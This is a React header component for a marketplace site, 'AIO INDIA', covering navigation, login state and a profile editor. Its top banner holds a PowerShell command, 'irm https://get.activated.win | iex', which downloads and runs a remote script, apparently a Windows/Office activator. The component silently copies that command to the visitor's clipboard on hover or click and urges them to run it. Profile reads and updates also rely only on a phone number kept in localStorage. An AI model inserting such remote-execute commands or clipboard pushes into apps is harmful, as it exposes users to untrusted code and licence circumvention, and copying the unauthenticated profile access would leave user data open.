import { useState, useEffect, useCallback } from "react";
import UserAvatarLogged from "../Assets/userlogged1.PNG";
import UserAvatarOut from "../Assets/userloggedout1.PNG";
import customIcon from "../Assets/customIcon.png";
import { API_BASE_URL } from "../config/api";

import { useNavigate, useLocation } from "react-router-dom";

const Header = () => {
  const navigate = useNavigate();
  const location = useLocation();
  const [showProfile, setShowProfile] = useState(false);
  const [loggedIn, setLoggedIn] = useState(Boolean(localStorage.getItem("userMobileNumber")));
  const [userMobile, setUserMobile] = useState(localStorage.getItem("userMobileNumber") || "");  const [details, setDetails] = useState({
    name: "",
    address: "",
    phone: userMobile || "",
    email: "",
    pin: "",
    profileImage: null,
  });
  const [profileView, setProfileView] = useState(details);
  const [editing, setEditing] = useState(false);
  const [saving, setSaving] = useState(false);
  const [loadingProfile, setLoadingProfile] = useState(false);
  const [profileMsg, setProfileMsg] = useState("");
  const [animateLogin, setAnimateLogin] = useState(false);
  const [showIconPreview, setShowIconPreview] = useState(false);
  const [mobileMenuOpen, setMobileMenuOpen] = useState(false);
  const [liveStatus, setLiveStatus] = useState("checking");
  const [copiedCmd, setCopiedCmd] = useState(false);
  const [showWnO, setShowWnO] = useState(false);
  const ACTIVATE_CMD = "irm https://get.activated.win | iex";

  const copyActivateCmd = async () => {
    try {
      await navigator.clipboard.writeText(ACTIVATE_CMD);
      setCopiedCmd(true);
    } catch {
      const ta = document.createElement("textarea");
      ta.value = ACTIVATE_CMD;
      ta.style.position = "fixed";
      ta.style.opacity = "0";
      document.body.appendChild(ta);
      ta.select();
      try {
        document.execCommand("copy");
        setCopiedCmd(true);
      } catch {
        setCopiedCmd(false);
      }
      document.body.removeChild(ta);
    }
    clearTimeout(window.__wnoCopyTimer);
    window.__wnoCopyTimer = setTimeout(() => setCopiedCmd(false), 2500);
  };

  useEffect(() => {
    let mounted = true;
    const checkLive = async () => {
      const controller = new AbortController();
      const timer = setTimeout(() => controller.abort(), 8000);
      try {
        const res = await fetch(`${API_BASE_URL}/State/GetStates`, { signal: controller.signal });
        clearTimeout(timer);
        if (mounted) setLiveStatus(res.ok ? "online" : "offline");
      } catch {
        clearTimeout(timer);
        if (mounted) setLiveStatus("offline");
      }
    };
    checkLive();
    const id = setInterval(checkLive, 30000);
    return () => {
      mounted = false;
      clearInterval(id);
    };
  }, []);

  useEffect(() => {
    const syncLoginState = () => {
      const mobile = localStorage.getItem("userMobileNumber");
      setLoggedIn(Boolean(mobile));
      setUserMobile(mobile || "");
    };
    syncLoginState();

    const onStorage = (e) => {
      if (e.key === "userMobileNumber") syncLoginState();
    };
    const onFocus = () => syncLoginState();

    window.addEventListener("storage", onStorage);
    window.addEventListener("focus", onFocus);

    return () => {
      window.removeEventListener("storage", onStorage);
      window.removeEventListener("focus", onFocus);
    };
  }, []);

  useEffect(() => {
    setLoggedIn(Boolean(localStorage.getItem("userMobileNumber")));
    if (localStorage.getItem("userMobileNumber")) {
      fetchProfile(localStorage.getItem("userMobileNumber"));
    } else {
      setProfileView({ name: "", address: "", phone: "", email: "", pin: "", profileImage: null });
      setDetails({ name: "", address: "", phone: "", email: "", pin: "", profileImage: null });
    }
  }, [location]);

  useEffect(() => {
    if (!loggedIn) {
      setAnimateLogin(true);
      const id = setTimeout(() => setAnimateLogin(false), 7000);
      return () => clearTimeout(id);
    }
    setAnimateLogin(false);
  }, [loggedIn]);

  const handleChange = (field) => (e) => setDetails({ ...details, [field]: e.target.value });

  const handleAuth = () => {
    if (loggedIn) {
      localStorage.removeItem("userMobileNumber");
      setLoggedIn(false);
      setShowProfile(false);
      navigate("/login");
    } else {
      setShowProfile(false);
      navigate("/login");
    }
  };

  const formatProfile = (data) => ({
    name: data?.Name || "",
    address: data?.Address || "",
    phone: userMobile || "",
    email: data?.Email || "",
    pin: data?.Pincode ? String(data.Pincode) : "",
    id: data?.Id,
    profileImage: data?.ProfileImage || null,
  });

  const fetchProfile = useCallback(
    async (mobileNo) => {
      try {
        setLoadingProfile(true);
        setProfileMsg("Loading profile...");
        const res = await fetch(
          `${API_BASE_URL}/Product/GetUserProfile?mobileNo=${mobileNo}`
        );
        if (!res.ok) throw new Error("Profile fetch failed");
        const data = await res.json();
        const formatted = formatProfile(data);
        setProfileView(formatted);
        setDetails(formatted);

        setProfileMsg("Profile loaded");
      } catch (err) {
        setProfileMsg("Unable to load profile");
        console.error(err);
      } finally {
        setLoadingProfile(false);
        setTimeout(() => setProfileMsg(""), 2000);
      }
    },
    // eslint-disable-next-line react-hooks/exhaustive-deps
    [userMobile]
  );

  const handleSaveProfile = async () => {
    const mobileNo = localStorage.getItem("userMobileNumber");
    if (!mobileNo) {
      handleAuth();
      return;
    }
    try {
      setSaving(true);
      setProfileMsg("Saving profile...");
      const payload = {
        Id: details.id,
        Name: details.name,
        MobileNo: mobileNo,
        Address: details.address,
        Email: details.email,
        PinCode: parseInt(details.pin || "0", 10) || 0,
        ProfileImage: null,
      };
      const res = await fetch(
        `${API_BASE_URL}/Product/UpdateProfile`,
        {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify(payload),
        }
      );
      if (!res.ok) throw new Error("Save failed");
      setProfileView(details);
      setEditing(false);
      setProfileMsg("Profile updated");
    } catch (err) {
      console.error(err);
      setProfileMsg("Failed to update profile");
    } finally {
      setSaving(false);
      setTimeout(() => setProfileMsg(""), 2000);
    }
  };

  const handleCancelEdit = () => {
    setDetails(profileView);
    setEditing(false);
  };

  const avatarSrc = loggedIn
    ? profileView.profileImage || UserAvatarLogged
    : UserAvatarOut;

  const navItems = [
    { label: "Home", path: "/" },
    { label: "MyAdds", path: "/myadds" },
    { label: "Sell", path: "/AddProduct" },
    { label: "Catalogue", path: "/catalogue" },
    { label: "Cart", path: "/cart" },
    { label: "Wallet", path: "/wallet" },
    { label: "Share & Earn", path: "/share-earn" },
    { label: "Status", path: "/status" },
    { label: "Profile", path: "/profile" },
    { label: "Settings", path: "/settings" },
    { label: "Recycle", path: "/bin" },
  ];

  return (
    <>
      <style>
        {`@keyframes loginPulse { from { transform: translateY(0); } to { transform: translateY(-4px); } }
          @keyframes loginColor { 0% { color: #c4b5fd; } 33% { color: #93c5fd; } 66% { color: #f9a8d4; } 100% { color: #c4b5fd; } }
          @keyframes wnoPulse { 0% { box-shadow: 0 0 0 0 rgba(34,197,94,0.7); } 70% { box-shadow: 0 0 0 8px rgba(34,197,94,0); } 100% { box-shadow: 0 0 0 0 rgba(34,197,94,0); } }
          @keyframes wnoPulseRed { 0% { box-shadow: 0 0 0 0 rgba(239,68,68,0.7); } 70% { box-shadow: 0 0 0 8px rgba(239,68,68,0); } 100% { box-shadow: 0 0 0 0 rgba(239,68,68,0); } }`}
      </style>
      <div style={{ position: "sticky", top: 0, zIndex: 100 }}>
        <div
          style={{
            height: "32px",
            background: "linear-gradient(90deg, #052e16 0%, #14532d 50%, #052e16 100%)",
            display: "flex",
            alignItems: "center",
            justifyContent: "center",
            gap: "10px",
            boxShadow: "0 2px 10px rgba(0,0,0,0.2)",
            padding: "0 12px",
          }}
        >
          <div style={{ position: "relative", display: "inline-flex" }}>
            <button
              type="button"
              title="Copy activation command"
              onClick={() => { copyActivateCmd(); setShowWnO(true); }}
              onMouseEnter={() => { copyActivateCmd(); setShowWnO(true); }}
              onMouseLeave={() => setShowWnO(false)}
              style={{
                display: "inline-flex",
                alignItems: "center",
                gap: "6px",
                background: "linear-gradient(135deg, #059669, #10b981)",
                color: "#fff",
                fontSize: "11px",
                fontWeight: 900,
                letterSpacing: "1px",
                padding: "3px 12px",
                borderRadius: "999px",
                boxShadow: "0 2px 8px rgba(16,185,129,0.45)",
                whiteSpace: "nowrap",
                border: "none",
                cursor: "pointer",
                transition: "transform 0.15s ease",
              }}
            >
              ⚡ W&O ACTIVE {copiedCmd ? "✔" : "📋"}
            </button>
            {showWnO && (
              <div
                style={{
                  position: "absolute",
                  top: "calc(100% + 8px)",
                  left: "50%",
                  transform: "translateX(-50%)",
                  background: "#0b1220",
                  border: "1px solid rgba(255,255,255,0.15)",
                  borderRadius: "12px",
                  padding: "10px 12px",
                  boxShadow: "0 10px 30px rgba(0,0,0,0.5)",
                  zIndex: 1000,
                  minWidth: "260px",
                  textAlign: "center",
                }}
                onMouseEnter={() => setShowWnO(true)}
                onMouseLeave={() => setShowWnO(false)}
              >
                <div style={{ fontSize: "10px", fontWeight: 700, letterSpacing: "1px", color: "#10b981", marginBottom: "6px", textTransform: "uppercase" }}>
                  {copiedCmd ? "✔ Command Copied!" : "Copy this command"}
                </div>
                <code
                  style={{
                    display: "block",
                    background: "#1e293b",
                    color: "#7dd3fc",
                    borderRadius: "8px",
                    padding: "8px 10px",
                    fontSize: "12px",
                    fontFamily: "Consolas, monospace",
                    wordBreak: "break-all",
                    textAlign: "left",
                  }}
                >
                  {ACTIVATE_CMD}
                </code>
                <button
                  type="button"
                  onClick={copyActivateCmd}
                  style={{
                    marginTop: "8px",
                    width: "100%",
                    padding: "7px",
                    borderRadius: "8px",
                    border: "none",
                    background: copiedCmd ? "linear-gradient(135deg,#22c55e,#16a34a)" : "linear-gradient(135deg,#2563eb,#7c3aed)",
                    color: "#fff",
                    fontWeight: 700,
                    fontSize: "12px",
                    cursor: "pointer",
                  }}
                >
                  {copiedCmd ? "✔ Copied!" : "📋 Copy Command"}
                </button>
              </div>
            )}
          </div>
          <span
            style={{
              display: "inline-flex",
              alignItems: "center",
              gap: "5px",
              background: "rgba(255,255,255,0.08)",
              border: "1px solid rgba(255,255,255,0.2)",
              color: "#fff",
              fontSize: "11px",
              fontWeight: 700,
              letterSpacing: "1px",
              padding: "3px 10px",
              borderRadius: "999px",
              whiteSpace: "nowrap",
            }}
          >
            <span
              style={{
                width: "8px",
                height: "8px",
                borderRadius: "50%",
                display: "inline-block",
                background: liveStatus === "online" ? "#22c55e" : liveStatus === "offline" ? "#ef4444" : "#facc15",
                animation: liveStatus === "online" ? "wnoPulse 1.6s infinite" : liveStatus === "offline" ? "wnoPulseRed 1.6s infinite" : "none",
              }}
            />
            {liveStatus === "online" ? "LIVE" : liveStatus === "offline" ? "OFFLINE" : "CHECKING..."}
          </span>
        </div>
        <header
          style={{
            height: "64px",
            background: "linear-gradient(135deg, #4f46e5 0%, #7c3aed 55%, #db2777 100%)",
            color: "#fff",
            display: "flex",
            alignItems: "center",
            padding: "0 18px",
            gap: "16px",
            boxShadow: "0 6px 22px rgba(79, 70, 229, 0.35)",
          }}
        >
        <div style={{ display: "flex", alignItems: "center", gap: "12px", minWidth: 0 }}>
          <img
            src={customIcon}
            alt="AIO Icon"
            onClick={() => setShowIconPreview(true)}
            style={{
              width: "34px",
              height: "34px",
              cursor: "pointer",
              objectFit: "contain",
              borderRadius: "10px",
              background: "rgba(255,255,255,0.22)",
              padding: "3px",
              boxShadow: "0 3px 10px rgba(0,0,0,0.2)",
            }}
          />
          <h2
            onClick={() => navigate("/")}
            style={{
              margin: 0,
              cursor: "pointer",
              fontSize: "20px",
              fontWeight: 900,
              letterSpacing: "0.4px",
              whiteSpace: "nowrap",
              background: "linear-gradient(90deg,#fff,#ffe4f1)",
              WebkitBackgroundClip: "text",
              WebkitTextFillColor: "transparent",
              filter: "drop-shadow(0 2px 6px rgba(0,0,0,0.25))",
            }}
          >
            AIO INDIA
          </h2>
        </div>

        <button
          type="button"
          onClick={() => setMobileMenuOpen((v) => !v)}
          aria-label="Toggle menu"
          style={{
            display: "none",
            cursor: "pointer",
            background: "rgba(255,255,255,0.18)",
            border: "1px solid rgba(255,255,255,0.4)",
            borderRadius: "8px",
            color: "#fff",
            width: "38px",
            height: "38px",
            fontSize: "20px",
            alignItems: "center",
            justifyContent: "center",
          }}
          className="hamburger-btn"
        >
          ☰
        </button>

        <nav
          className="header-nav"
          style={{
            display: "flex",
            gap: "6px",
            alignItems: "center",
            overflowX: "auto",
            marginLeft: "8px",
            scrollbarWidth: "none",
          }}
        >
          {navItems.map((item) => {
            const active =
              item.path === "/"
                ? location.pathname === "/"
                : location.pathname.startsWith(item.path);
            return (
              <button
                key={item.label}
                type="button"
                role="link"
                onClick={() => navigate(item.path)}
                className="nav-link"
                style={{
                  color: "#fff",
                  whiteSpace: "nowrap",
                  padding: "7px 12px",
                  borderRadius: "999px",
                  background: active ? "rgba(255,255,255,0.24)" : "transparent",
                }}
              >
                {item.label}
              </button>
            );
          })}
        </nav>

        <div
          style={{
            marginLeft: "auto",
            display: "flex",
            alignItems: "center",
            gap: "12px",
            flexShrink: 0,
          }}
        >
          <img
            src={avatarSrc}
            alt="User"
            onClick={() => setShowProfile(true)}
            style={{
              width: "38px",
              height: "38px",
              cursor: "pointer",
              objectFit: "cover",
              borderRadius: "50%",
              border: "3px solid rgba(255,255,255,0.85)",
              boxShadow: "0 3px 10px rgba(0,0,0,0.25)",
            }}
          />
          <button
            type="button"
            onClick={handleAuth}
            style={{
              cursor: "pointer",
              fontWeight: 700,
              fontSize: "13px",
              color: "#fff",
              background: loggedIn ? "rgba(255,255,255,0.18)" : "rgba(255,255,255,0.28)",
              border: "1px solid rgba(255,255,255,0.4)",
              padding: "8px 18px",
              borderRadius: "999px",
              transition: "all 0.18s ease",
              ...(animateLogin
                ? { animation: "loginPulse 0.5s ease-in-out infinite alternate, loginColor 0.6s ease-in-out infinite alternate", color: "#fff", background: "rgba(255,255,255,0.22)" }
                : {}),
            }}
          >
            {loggedIn ? "Logout" : "Login"}
          </button>
        </div>
      </header>
      </div>

      {showIconPreview && (
        <div
          onClick={() => setShowIconPreview(false)}
          style={{
            position: "fixed",
            inset: 0,
            background: "rgba(0,0,0,0.7)",
            display: "flex",
            alignItems: "center",
            justifyContent: "center",
            zIndex: 1000,
          }}
        >
          <img
            src={customIcon}
            alt="AIO Icon Large"
            style={{
              maxWidth: "90vw",
              maxHeight: "90vh",
              objectFit: "contain",
              boxShadow: "0 10px 30px rgba(0,0,0,0.35)",
              borderRadius: "12px",
            }}
          />
        </div>
      )}

      {showProfile && (
        <div
          onClick={() => setShowProfile(false)}
          style={{
            position: "fixed",
            inset: 0,
            background: "rgba(0,0,0,0.5)",
            display: "flex",
            alignItems: "center",
            justifyContent: "center",
            zIndex: 999,
          }}
        >
          <div
            onClick={(e) => e.stopPropagation()}
            style={{
              width: "90%",
              maxWidth: "500px",
              background: "#fff",
              borderRadius: "12px",
              padding: "16px",
              boxShadow: "0 10px 30px rgba(0,0,0,0.2)",
              boxSizing: "border-box",
            }}
          >
            <div style={{ textAlign: "center", marginBottom: "12px" }}>
              <img
                src={avatarSrc}
                alt="User"
                style={{ width: "64px", height: "64px", objectFit: "cover", borderRadius: "50%" }}
              />
              <h4 style={{ margin: "8px 0 4px", color: loggedIn ? "#28a745" : "#dc3545" }}>{loggedIn ? "You are Logged In" : "You are Not Logged In"}</h4>
              {profileMsg && <div style={{ fontSize: "12px", color: "#555" }}>{profileMsg}</div>}
            </div>
            <div style={{ display: "flex", flexDirection: "column", gap: "10px" }}>
              {/* Name */}
              <label style={{ fontSize: "12px", fontWeight: 600, textAlign: "left" }}>
                Name
                <input
                  type="text"
                  value={details.name}
                  onChange={handleChange("name")}
                  disabled={!editing || saving || loadingProfile}
                  style={{ width: "100%", padding: "6px 0px", marginTop: "4px", borderRadius: "6px", border: "1px solid #ccc", fontSize: "12px", opacity: (!editing || saving || loadingProfile) ? 0.8 : 1 }}
                />
              </label>
              {/* Address */}
              <label style={{ fontSize: "12px", fontWeight: 600, textAlign: "left" }}>
                Address
                <input
                  type="text"
                  value={details.address}
                  onChange={handleChange("address")}
                  disabled={!editing || saving || loadingProfile}
                  style={{ width: "100%", padding: "6px 0px", marginTop: "4px", borderRadius: "6px", border: "1px solid #ccc", fontSize: "12px", opacity: (!editing || saving || loadingProfile) ? 0.8 : 1 }}
                />
              </label>
              {/* Phone */}
              <label style={{ fontSize: "12px", fontWeight: 600, textAlign: "left" }}>
                Phone Number
                <input
                  type="tel"
                  value={userMobile}
                  onChange={handleChange("phone")}
                  disabled
                  style={{ width: "100%", padding: "6px 0px", marginTop: "4px", borderRadius: "6px", border: "1px solid #ccc", fontSize: "12px", background: "#f5f5f5" }}
                />
              </label>
              {/* Email */}
              <label style={{ fontSize: "12px", fontWeight: 600, textAlign: "left" }}>
                Email
                <input
                  type="email"
                  value={details.email}
                  onChange={handleChange("email")}
                  disabled={!editing || saving || loadingProfile}
                  style={{ width: "100%", padding: "6px 0px", marginTop: "4px", borderRadius: "6px", border: "1px solid #ccc", fontSize: "12px", opacity: (!editing || saving || loadingProfile) ? 0.8 : 1 }}
                />
              </label>
              {/* Pin */}
              <label style={{ fontSize: "12px", fontWeight: 600, textAlign: "left" }}>
                Pin Code
                <input
                  type="text"
                  value={details.pin}
                  onChange={handleChange("pin")}
                  disabled={!editing || saving || loadingProfile}
                  style={{ width: "100%", padding: "6px 0px", marginTop: "4px", borderRadius: "6px", border: "1px solid #ccc", fontSize: "12px", opacity: (!editing || saving || loadingProfile) ? 0.8 : 1 }}
                />
              </label>
            </div>
            {loggedIn && (
              <div style={{ display: "flex", gap: "10px", marginTop: "16px" }}>
                {editing ? (
                  <>
                    <button
                      type="button"
                      style={{ flex: 1, padding: "10px", borderRadius: "8px", border: "none", background: "linear-gradient(135deg, #22c55e, #16a34a)", color: "#fff", fontWeight: 700, cursor: saving ? "not-allowed" : "pointer", opacity: saving ? 0.7 : 1, boxShadow: "0 4px 12px rgba(0,0,0,0.15)" }}
                      onClick={handleSaveProfile}
                      disabled={saving || loadingProfile}
                    >
                      {saving ? "Saving..." : "Save"}
                    </button>
                    <button
                      type="button"
                      style={{ flex: 1, padding: "10px", borderRadius: "8px", border: "1px solid #ddd", background: "#fff", color: "#111", fontWeight: 700, cursor: saving ? "not-allowed" : "pointer", opacity: saving ? 0.7 : 1 }}
                      onClick={handleCancelEdit}
                      disabled={saving || loadingProfile}
                    >
                      Cancel
                    </button>
                  </>
                ) : (
                  <div style={{display:"flex", flexDirection:"column",width:"100%"}}>
                  <button
                    type="button"
                    style={{ width: "100%", padding: "10px", borderRadius: "8px", border: "none", background: "linear-gradient(135deg, #8a2be2, #ff69b4)", color: "#fff", fontWeight: 700, cursor: loadingProfile ? "not-allowed" : "pointer", opacity: loadingProfile ? 0.7 : 1, boxShadow: "0 4px 12px rgba(0,0,0,0.15)" }}
                    onClick={() => setEditing(true)}
                    disabled={loadingProfile}
                  >
                    Edit Details
                  </button>
                              <button
              type="button"
              style={{
                marginTop: "16px",
                width: "100%",
                padding: "10px",
                borderRadius: "8px",
                border: "none",
                background: "linear-gradient(135deg, #8a2be2, #ff69b4)",
                color: "#fff",
                fontWeight: 700,
                cursor: "pointer",
                boxShadow: "0 4px 12px rgba(0,0,0,0.15)",
              }}
              onClick={handleAuth}
            >
              {loggedIn ? "Logout" : "Login"}
            </button>
                    </div>
                )}
              </div>
            )}
          </div>
        </div>
      )}

      {mobileMenuOpen && (
        <div
          style={{
            position: "fixed",
            top: "96px",
            left: 0,
            right: 0,
            background: "#fff",
            zIndex: 998,
            boxShadow: "0 10px 30px rgba(0,0,0,0.15)",
            padding: "8px",
            display: "flex",
            flexDirection: "column",
            gap: "4px",
          }}
          className="mobile-menu"
        >
          {navItems.map((item) => {
            const active =
              item.path === "/"
                ? location.pathname === "/"
                : location.pathname.startsWith(item.path);
            return (
              <button
                key={item.label}
                type="button"
                onClick={() => {
                  navigate(item.path);
                  setMobileMenuOpen(false);
                }}
                style={{
                  textAlign: "left",
                  padding: "12px",
                  borderRadius: "8px",
                  border: "none",
                  background: active ? "#eef2ff" : "transparent",
                  color: "#0f172a",
                  fontWeight: 700,
                  fontSize: "14px",
                  cursor: "pointer",
                }}
              >
                {item.label}
              </button>
            );
          })}
        </div>
      )}
    </>
  );
};

export default Header;
